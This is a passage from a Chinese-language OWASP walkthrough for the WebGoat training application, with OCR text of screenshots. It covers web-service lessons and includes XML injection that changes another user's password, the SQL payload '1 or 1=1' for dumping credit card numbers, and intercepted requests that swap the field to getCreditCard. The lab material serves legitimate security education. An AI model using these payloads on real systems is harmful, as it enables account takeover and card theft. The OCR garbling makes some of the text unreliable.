hemas.xmlsoap.org/se hemas.xmlsoap.org/se	v5.0 pap/envelope#		
<ns1:get< td=""><td>FirstName \$ pe="xsd:int"&gt;</td><td>SOAP-ENV:encodingStyle=" &gt;101</td><td>http://schemas.xmlsoa</td><td>p.org/soap/encoding/":</td><td>xmlns:ns1="http://lessons"&gt;</td><td></td></ns1:get<>	FirstName \$ pe="xsd:int">	SOAP-ENV:encodingStyle=" >101	http://schemas.xmlsoa	p.org/soap/encoding/":	xmlns:ns1="http://lessons">	
						•
		Accept changes	Cancel changes	Abort request	Cancel ALL intercepts	

使用 SOAP 参数更新 HTTP request, 响应内容是 Joe。

•			
Parsed	Raw		
Version	Status	Message	
HTTP/1.1	200	ок	
		Header	Value
Date			Tue, 23 Oct 2012 09:24:58 GMT
Server			Apache-Coyote/1.1
Content-Typ	pe		text/xml;charset=utf-8
/ia			1.1 owaspbwa.localdomain
/ary			Accept-Encoding
Contont En	codina		azin
XML	ext He	2X	
🗂 <soaper< td=""><td>w:Envelop</td><td>pe xmlns:soapenv="http://schema</td><td>.s. xmlsoap. org/soap/envelope/″xmlns:xsd=″http://www.w3. org/2001/XMLSchema″xmln</td></soaper<>	w:Envelop	pe xmlns:soapenv="http://schema	.s. xmlsoap. org/soap/envelope/″xmlns:xsd=″http://www.w3. org/2001/XMLSchema″xmln
	apenv:Bod	y>	

重复以上操作,使用新的 Operation: getLastName。

POST http://webgoatvm/WebGoat/services/SoapRequest HTTP/1.1

Host: webgoatvm

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0



```
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
   Accept-Encoding: gzip, deflate
   Proxy-Connection: keep-alive
   Referer: http://webgoatvm/WebGoat/attack?Screen=171&menu=1900
   Cookie: JSESSIONID=095FE3EEE0BBFA63E32D2D961F19911A
   Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
   Content-Type: text/xml
   SOAPAction:
   Content-length: 40
   <?xml version="1.0" encoding="UTF-8"?>
   <SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:xsd="http://www.w3.org/2001/XMLSchema"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <SOAP-ENV:Body>
   <ns1:getLastName
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:ns1="http://lessons">
   <id xsi:type="xsd:int">101</id>
   </nsl:getLastName>
   </SOAP-ENV:Body>
   </SOAP-ENV:Envelope>
```

返回信息用户 LastName 为 Snow。



310	106, 23 OC 2012 03.30.00 OWT
rver	Apache-Coyote/1.1
ontent-Type	text/xml;charset=utf-8
а	1.1 owaspbwa.localdomain
iry	Accept-Encoding
antont Encoding	azin
🔽	
XML Text Hex	

] <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/IMLSchema" xmlns:xsi="http://w - 🗂 <soapenv:Body>

Image: the set of t

刷新左侧导航页面,完成本节课程。

# 2.18.2WSDL 扫描(WSDL Scanning)

# 2.18.2.1 技术概念或主题(Concept / Topic To Teach)

Web Services 通过使用 SOAP 请求进行通信。这个请求提交到一个尝试执行一个 Web 服务描述语言(WSDL)定义的函数的 Web 服务。让我们一起来学习一些关于 WSDL 的文件。 查看一下 WebGoat 的 WSDL 文件。

### 2.18.2.2 技术原理(How It works)

无

### 2.18.2.3 总体目标(General Goals)

本页面是 Web Service 的 API。查看 WSDL 文件,并尝试获取客户的其它信息,如:信用 卡号码。



OWASP 中国 The Open Web Application Security Project

Restart this Lesson

Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.

#### General Goal(s):

This screen is the API for a web service. Check the WSDL file for this web service and try to get some customer credit numbers.

View the web services definition language (WSDL) to see the complete API: WebGoat WSDL File

### 2.18.2.4 操作方法(Solutions)

### 启动 WebScarab,任意选择后点提交

Solution VideosWeb Services communicate through the use of SOAP Restart this Lesson requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.

#### General Goal(s):

This screen is the API for a web service. Check the WSDL file for this web service and try to get some customer credit numbers.

Enter your account number:	101
Select the fields to return:	First Name Last Name Login Count
Sub	mit
View the web services definit WebGoat WSDL File	ion language (WSDL) to see the complete API:

By Alex Smolen

OWASP Foundation | Project WebGoat | Report Bug

使用 WebScarab 截获请求,并将其中的"field=getLastName"改为"field=getCreditCard"



https://www.intercompletion.com/				
reed Rew	171			
T flightens (Onesdo Subtaktive Nermann 11 10 HTTP1) 1 et miggeligt magazi men (Basel Method Subtaktive Nermann 11 10 High Subt	Ľ			

点击"Accept Changes"后提交数据,返回信息里能够看到 getCreditCard 字段的信息。

Solution VideosWeb Services communicate through the use of SOAP Restart this Lesson requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.

#### General Goal(s):

This screen is the API for a web service. Check the WSDL file for this web service and try to get some customer credit numbers.

\* Congratulations. You have successfully completed this lesson.

Enter your account number:	101		
Select the fields to return:	First Name Last Name Login Count		
Sub	mit		
getCreditCard 987654321			
View the web services definit WebGoat WSDL File	ion language <mark>(</mark> W	SDL) to see	the complete API:
			By Alex Smolen

# 2.18.3Web Service SAX 注入(Web Service SAX Injection)

### 2.18.3.1 技术概念或主题(Concept / Topic To Teach)

Web Services 通过使用 SOAP 请求进行通信。这个请求提交到一个尝试执行一个 Web 服务描述语言(WSDL)定义的函数的 Web 服务。让我们一起来学习一些关于 WSDL 的文件。 查看一下 WebGoat 的 WSDL 文件。



### 2.18.3.2 技术原理(How It works)

无

### 2.18.3.3 总体目标(General Goals)

有些 Web 界面在后台使用 Web Services。如果前端所有输入验证都依赖 Web Services, 那么它可能会破坏 Web 界面发送数据的 XML 内容。

本节课程中,您需要修改除了用户101以外的另一个用户的密码。

Solution Videos

**Restart this Lesson** 

Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.

#### General Goal(s):

This screen is the API for a web service. Check the WSDL file for this web service and try to get some customer credit numbers.

Enter your account number:	101	
Select the fields to return:	First Name Last Name Login Count	*
		-

View the web services definition language (WSDL) to see the complete API: WebGoat WSDL File

## 2.18.3.4 操作方法(Solutions)

SAX 解析器会解析任何格式正常的 XML 文件,例如:匹配到有效的标记符号及闭合符 号即认为正确。当您向原有的 XML 文件中添加新的 changePAssword 元素时,如果 id 和 password 等标记都正确,那么解析器将很乐意帮您去修改另一个 userid 的密码。

在课程页面密码框中输入一个密码,开启 WebScarab。

点击 "Go!" 按钮提交数据,在 WebScarab 拦截的请求中修改 XML 文件,在 password 选项中添加如下代码:

newpassword</password>

<th>:changeF</th> <th>assword&gt;</th>	:changeF	assword>
--	----------	----------

<wsns1:changePassword>

<id xsi:type='xsd:int'>102</id>



#### <password xsi:type='xsd:string'>notforyoutoknow

### 确定后完成该课程。

Solution VideosWeb Services communicate through the use of SOAP Restart this Lesson requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.

#### General Goal(s):

Some web interfaces make use of Web Services in the background. If the frontend relies on the web service for all input validation, it may be possible to corrupt the XML that the web interface sends.

In this exercise, try to change the password for a user other than 101.

\* Congratulations. You have successfully completed this lesson.

lease change your password: Go!	
<pre>?xml version='1.0' encoding='UTF-8'?&gt;</pre>	
wsns0:Envelope	
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'	
xmlns:xsd='http://www.w3.org/2001/XMLSchema'	
xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'	
xmlns:wsns1='http://lessons.webgoat.owasp.org'>	
<wsns0:body></wsns0:body>	
<wsns1:changepassword></wsns1:changepassword>	
<id xsi:type="xsd:int">101</id>	
<pre><password xsi:type="xsd:string">newpassword</password> </pre>	
<pre>sword&gt; <wsns1:changepassword> <id xsi:type="xsd:int">102</id> <password pre="" xsi<=""></password></wsns1:changepassword></pre>	
type='xsd:string'>notforyoutoknow	
/wsns0:Envelope>	

You have changed the passsword for userid 102 to 'notforyoutoknow'

## 2.18.4Web Service SQL 注入(Web Service SQL Injection)

### 2.18.4.1 技术概念或主题(Concept / Topic To Teach)

Web Services 通过使用 SOAP 请求进行通信。这个请求提交到一个尝试执行一个 Web 服务描述语言(WSDL)定义的函数的 Web 服务。让我们一起来学习一些关于 WSDL 的文件。 查看一下 WebGoat 的 WSDL 文件。

### 2.18.4.2 技术原理(How It works)



### 2.18.4.3 总体目标(General Goals)

查看 WSDL 文件,并尝试获取多个客户的信用卡帐号。您在屏幕上无法看到返回数据。 完成该课程后,刷新页面,左侧将创先绿色通过标识。

> Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.

#### General Goal(s):

Check the web service description language (WSDL) file and try to obtain multiple customer credit card numbers. You will not see the results returned to this screen. When you believe you have succeded, refresh the page and look for the 'green star'.

Enter your Account Number	r: 101		Go!			
SELECT * FROM user_date	a WHERE use	erid = 101				
USERID FIRST_NAME	AST_NAME	CC_NUMBER	CC_TYPE	COOKIE	LOGIN_COUNT	
101 Joe S	now	987654321	VISA		0	
101 Joe S	now	2234200065411	MC		0	

Exploit the following WSDL to access sensitive data: WebGoat WSDL File

By Alex PARASOFT

### 2.18.4.4 操作方法(Solutions)

该课程可以通过使用 Web 服务工具 SOAPUI 轻松解决。这里我们使用 WebScarab。进入到 Web Services,您会看到一个调用的 Web 服务或者 WSDL 历史文件。

首先,手工访问一次本课程的 WSDL 文件: <u>http://webgoatvm/WebGoat/services/WsSq</u> lInjection?WSDL

Solution VideosWeb Services communicate through the use of SOAP Restart this Lesson requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.

#### General Goal(s):

Check the web service description language (WSDL) file and try to obtain multiple customer credit card numbers. You will not see the results returned to this screen. When you believe you have suceeded, refresh the page and look for the 'green star'.

Enter your Account Number:	101	Go!	

SELECT \* FROM user\_data WHERE userid = 101

USERID	FIRST_NAME	LAST_NAME	CC_NUMBER	CC_TYPE	COOKIE	LOGIN_COUNT
101	Joe	Snow	987654321	VISA		0
101	Joe	Snow	2234200065411	MC		0

Exploit the following WSDL to access sensitive data: WebGoat WSDL File

By Alex Smolen	<b>国PARASOFT</b>
-,	We make software work."

在 WebScarab 中,您可以从顶部的下拉框中选择 WSDL。WebScarab 将解析 XML 文件,所 以您可以选择调用的操作。然后您可以输入一个调用的参数值。在"vaule"输入1 or 1=1, 点执行,会弹出一个基本身份验证框,输入用户名 guest,密码 guest,然后点 0K,点"Execute",



即可返回所有结果。如果没有弹出,可以再 WebScarab 的""Tools" > "Credentials""中选择。您需要选中"Ask when required"。(需要先打开 WSDL 文件,就能在 WebScarab 的 WebServices 中看到相应的内容了。)

Enter your	credentials to access this web site	
	Basic O Domain	1
Host	localhost.	ŀ
Realm	WebGoat Application	
Username	guest	ſ
Password	*****	
	Cancel Ok	

双击 value,设置数值为1 or 1=1,点击【execute】按钮提交数据。幸运的话,您将 看到多个客户的信用卡信息,完成本课程。

Summary	Messages	Proxy Manual Regu	st WebServices	Spider Extensio	IS XSS/CRLF	SessionID Analysis	Scripted	Fragments	Fuzzer (	Compare Search		
DL :	251 - GET http://	localhost.:8080.WebGo	Uservices/WsSallni	ection 200 OK								-
DL URL												L
dce :	WsSaliniection	Service										_
ration :	getCreditCard											
20000		Node		Ty	99			Nillable	6		Value	
etCred	itCardRequest									1 milet		
] iq			string							1 or 1=1		
	and the second se											
ad	Raw											
ion	Status Messa	age										
P/1.1	200 OK											
	Header	1		Value								
. 10		Apache-Coyote/1.1										
tent-Ty	pe	text/ml,charset=ut	1									
		Wed, 19 Oct 2011 (	14:50 OMT									
nection		1010:5-0.										
AL []	Text Hex											
Constant	w Freelose valo	a ananana "http://acha	an walanan <i>malana</i> t	/aneitana/"/enine/eed	Thin Have all	are/2001/1815chana" w	al verienzz"kés	n Una star	e/2001/1005-1	hana-instanca <sup>*</sup> >		_
	Carl - ant Cardit C	a Research second and	dis dial at him 11	ashing unlasin orals	unferstational" a	alas aslathts: //less	an achmat of		C			
0.01	Carlo Barrer Barrer	the unitary visit a variant. And	The state of the s	Purchase and styles and a	de la constante a	Asia ani- avy.irataa	an several o					
+	gettreditta	reneturn sospenc array	/pe= xsd string[13]	merus soabanc= with	//schemes.zmls	oab and/reab/ancound/	X31. (974- 1	Loapenc: Array				
• 🖬 •	🕈 🥅 <getcredi< td=""><td>itCardBeturn xxi:type="</td><td>ad:string")</td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td></getcredi<>	itCardBeturn xxi:type="	ad:string")									
*	🕈 🥅 CeetCredi	(Cardleturn ass type)"	ad string?>									
Ŷ 🗍 Ŷ		4321										
† 🖬 †	- 98785	CardBature and the off	sd:string?									
† 🖬 †	9 - CastCredi	toon mercure and type-										
*	9	00065411										
*	98785- 9 223427 9 223427 9 223427 9 223427 223427 223427 223427	00005411 1CardEsturn xxi:type=" 00002222	sd string?									
*		00065411 .tCardEeturn xxs:type** 00002222 .tCardEeturn xxi:type**	Cynirie le									

### 2.18.4.4.1 说明

如果您的操作没有任何反应,建议通过下拉菜单再次重新选择 service 和 operation。最好的办法是发起一个原始的 SOAP 请求。

### 2.18.4.5 总体目标(General Goals)

本节课程主要让用户熟悉不同的编码方案。



# 2.18.4.6 操作方法(Solutions)

输入 rot13 后,	可查看不同编码结果和描述信息。

描述	编码	解码
Base64 编码是一种简单可逆编码,用于编成 AscII 字符,用于制作可打印的字符串,但没有提供安全保护。	cm90MTM=	?u
实体编码使用特殊的序列如&作为特殊字符,这样可以防止这些字符被解释。	rot13	rot13
基于密码的加密(PBE),是强大的文本 密码加密。没有密码无法解密。	8fahJh9R82A=	非加密字符串
MD5 哈希是一个可以用来验证一个字符串 或字节数组的校验,具有不可逆性,无法 通过逆转找到原始字符串或字节。由于其 加密晦涩难懂,如果可以选择,可以使用 SHA-256.	Jdc1C0ADL9kz0dcV/UelcA==	N/A
统一编码	没有执行	没有执行
统一编码	rot13	rot13
十六进制编码只是简单的把编码字节转换 为%XX格式。	%72%6F%74%31%33	字符串不包括十六进 制字符对
ROT13 是一种使文本不可读的方法,但是 它很容易被逆转,且没有安全保护。	ebg13	rot13
XOR 密码编码是一种脆弱的加密方案,它将密码混合在数据中。	NQAbU1Y=	
双统一编码	没有执行	没有执行
双 URL 编码	rot13	rot13

# 2.19 管理功能(Admin Functions)

# 2.19.1报告卡(Report Card)

本页面展现了用户学习进度及过关状态等信息。

6	OWASP 中国	ľ
U	The Open Web Application Security Project	ł

Comments and suggestions are welcome. webgoat@owasp.org

Results for: guest			
Lesson	Complete	Visits	Hints
Normal user lessons	5		
How to work with WebGoat	Y	224	0
Tomcat Configuration	N	0	0
Useful Tools	N	0	0
How to create a Lesson	N	0	0
Http Basics	N	0	0
HTTP Splitting	N	0	0
Using an Access Control Matrix	N	0	0
Bypass a Path Based Access Control Scheme	N	0	0
LAB: Role Based Access Control	N	0	0
Remote Admin Access	N	0	0
Same Origin Policy Protection	N	0	0
LAB: DOM-Based cross-site scripting	N	0	0
LAB: Client Side Filtering	N	0	0
DOM Injection	N	0	0
XML Injection	N	0	0
JSON Injection	N	0	0
Silent Transactions Attacks	N	0	0
Dangerous Use of Eval	N	0	0
Insecure Client Storage	N	0	0
Password Strength	N	0	0

String SQL Injection	Ŷ	3	0	
LAB: SQL Injection	N	14	1	
Modify Data with SQL Injection	N	0	0	
Add Data with SQL Injection	N	0	0	
Database Backdoors	N	0	0	
Blind Numeric SQL Injection	Y	5	0	
Blind String SQL Injection	N	0	0	
Denial of Service from Multiple Logins	N	1	1	
Insecure Login	N	0	0	
Forced Browsing	Y	1	0	
Encoding Basics	Y	8	0	
Malicious File Execution	Y	1	0	
Bypass HTML Field Restrictions	N	0	0	
Exploit Hidden Fields	N	2	1	
Exploit Unchecked Email	N	0	0	
Bypass Client Side JavaScript Validation	N	0	0	
Hijack a Session	N	3	0	
Spoof an Authentication Cookie	N	2	0	
Session Fixation	N	0	0	
Create a SOAP Request	Y	3	0	
WSDL Scanning	N	3	0	
Web Service SAX Injection	N	0	0	
Web Service SQL Injection	N	15	0	
Report Card	N	0	0	
The CHALLENGE!	N	0	0	
Hackable Admin Scree	ins			
User Information	N	0	0	
Product Information	N	0	0	
Adhoc Query	N	0	0	
Actual Admin Screen	s			
Summary Report Card	N	0	0	
Refresh Database	N	0	0	

http://www.owasp.org.cn

# 2.20 挑战 (Challenge)

# 2.20.1挑战(The CHALLENGE!)

## 2.20.1.1 总体目标(General Goals)

您的任务是破坏身份验证方案,从数据库中盗取所有的信用卡信息,然后破坏这个网站。 您需要利用您在其他课程中学到的技术。要破坏的主页是"webgoat\_challenge\_guest.jsp"页面。

### 登录:

使用帐号登录系统。如果您还没有帐号,请查看 OWASP admin 页面。



Solution Videos

Restart this Lesson

Your mission is to break the authentication scheme, steal all the credit cards from the database, and then deface the website. You will have to use many of the techniques you have learned in the other lessons. The main webpage to deface for this site is 'webgoat\_challenge\_guest.jsp'

	-			-
-	т			
		<b>M A</b>	 101	
			 101	

### Sign In

Please sign in to your account. See the OWASP admin if you do not have an account. \*Required Fields

*User Name:	
*Password:	

Login

OWASP Foundation | Project WebGoat | Report Bug